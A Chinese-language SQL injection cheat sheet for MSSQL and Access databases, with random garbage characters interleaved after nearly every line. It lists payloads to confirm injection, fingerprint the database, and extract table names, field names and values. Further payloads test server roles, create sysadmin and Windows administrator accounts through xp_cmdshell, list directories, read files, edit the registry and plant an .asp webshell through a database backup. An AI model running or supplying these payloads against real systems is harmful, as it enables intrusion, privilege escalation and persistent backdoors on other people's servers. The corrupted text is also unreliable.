1.判断是否有注入;and 1=1 ;and 1=2 �BC|=-�^�(
2.初步判断是否是mssql ;and user>0 O�2z{>\��
k0[b4�cr`�
3.注入参数是字符'and [查询条件] and ''=' =z��_.R��E
`�1;m:,9�
4.搜索时没过滤参数的'and [查询条件] and '%25'=' F\L�Aw#IJ
)?es3Ehqq
5.判断数据库系统 <�0R�$y��B
|�]�s�/NNU
;and (select count(*) from sysobjects)>0 mssql ,��|�:TM�L
%+BiN)R�*x
;and (select count(*) from msysobjects)>0 access _Z9H���Ol@
�6k56�9c{7
�S}Q�vG�&c
Sx�yXz8+e[
6.猜数据库 ;and (select Count(*) from [数据库名])>0 2�VB|�a;Mo
E�]T>m!�6
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 =~qQ?;o�n
.�K�
I6<k/
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 �R<* c����
\PHb�JN:BI
9.(1)猜字段的ascii值(access) �2L\}�����
&`]��Lg�?J
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 T�9&-�t7�:
T��U-a�L��
(2)猜字段的ascii值(mssql) {0~ Sj%�Ze
R�;�XG��2�
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 Hh���Z�lHL
m�I$<�+S1!
10.测试权限结构(mssql) c~,OU�7�[
�3mmp5� �d
yf
7Sz�$Eq
vIMLU�L�0
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- `=}w(V8p�c
`1��O�<UJX
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- [SJ-]P|^�l
=I�(�F(AE
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- 7�IEG%FY
T
#Qi��r%\*V
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- q:iB}c�h5R
VXfp�=JE��
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- PM(M� c]�6
ET2�^1X#j
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- te<�l�CD�6
JI)@h �4b�
;and 1=(select IS_MEMBER('db_owner'));-- \w6A-�daD0
VM.4w.})_E
E(�(U=P}+g
)qbjX�{GZ7
11.添加mssql和系统的帐户 _��"4�u?C#
,�\�%qERk�
;exec master.dbo.sp_addlogin username;-- �Q;h6F{i��
;exec master.dbo.sp_password null,username,password;-- OrG1Mfx&2%
�z��yHHz\{
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- _N�wB�7@ e
b�2��3�5Zm
;exec master.dbo.xp_cmdshell 'net user username password 8�lNkY`P7s
l-�mt�{2��
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- $2><4~T;|A
�#?3oGrS Y
;exec master.dbo.xp_cmdshell 'net user username password /add';-- u`e�zQvrcy
[$x&J6�jF.
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- A.8[FkiNmD
W Z_yaG$U�
Q�
1�:7� 9
��3�$~oQC�
12.(1)遍历目录 4�.t72*ML�
i(9 5�=t�(
;create table dirs(paths varchar(100), id int) DI�)!�x {"
G+S��MH`�h
;insert dirs exec master.dbo.xp_dirtree 'c:\' C�I�8bHY�$
9&O7�F}VP2
;and (select top 1 paths from dirs)>0 -�^f>=xa4J
phc9esz��
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) �Jtbw�Y@R�
->u}�b?aF
/=��i+7^�
k�c:�>[�{9
(2)遍历目录 yh'P17N|q�
��@
)2<$d�
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- 4?c4GT9(6S
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 kp=wz0�#��
n#dv�BK�0M
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 XD8Q��2�un
Q��w@_.�I�
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 ?E6�C|A$I
+�>BD^[^^�
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 wj�$WE�3Y�
�M\!�z='Fi
����IP�DQ
py':U�QS*q
13.mssql中的存储过程 y7@�q]�~�%
Js0�h�lWu�
xp_regenumvalues 注册表根键, 子键 ��n%&+yg��
sqE? U*8.-
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 TJ`J�q�nh�
_!��:*�&{�
xp_regread 根键,子键,键值名 *,y� .%�`o
F&6Xo�]�?�
;exec xp_regread 4RD�dfY\%u
��AD0pmD��
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 )oCb9K:�km
�Y| 2Gj(*8
xp_regwrite 根键,子键, 值名, 值类型, 值 _I<LB0kgf.
qP4v���H�]
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 �%VsI����g
�C/�{%f,rU
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 <
��/\y<]b
6��JUjT]S%
xp_regdeletevalue 根键,子键,值名 svj��0;�x5
2r*Y�d(e�
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 ]`H�8r y�2
tO�8<N'TD�
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 >2�1f�%�Z
KOYcT'J@vR
N79���9@:.
N�[j*Q 8X_
14.mssql的backup创建webshell U{|WN7Q:A�
J<27w3bs~p
use model ITr@;@}�c]
rhQ�v,�F9
create table cmd(str image); �HT�w7l�]]
U�_l#lGA(H
insert into cmd(str) values (''); P��u�ods�d
@q<F_'7�is
backup database model to disk='c:\l.asp'; t�/Y)%���N
f�XfO9{�E�
rc�()�Eo50
8D5v'[��j-
15.mssql内置函数 �JR�^#NefJ
n[��tE�S6u
;and (select @@version)>0 获得Windows的版本号 ,o68xfdZVW
�Xn3
\a81�
;and user_name()='dbo' 判断当前系统的连接用户是不是sa aA3��KJ��a
p�6|RV(�?8
;and (select user_name())>0 爆当前系统的连接用户 �hJk�F�-yW
45H(�.}&f�
;and (select db_name())>0 得到当前连接的数据库 "79"SSfOc�
���OK���\F
Yfjp�:hg/!
ON
q�=b�I*
16.简洁的webshell �p"k[��ac{
�d�p~�] Wx
use model 4b�<��>gpQ
-er8(sn�DQ
create table cmd(str image); ed:[^#L�j
w$%1j+%�&�
insert into cmd(str) values (''); 4�o``t�]�
�R}�J}Q�b�
backup database model to disk='g:\wwwtest\l.asp';
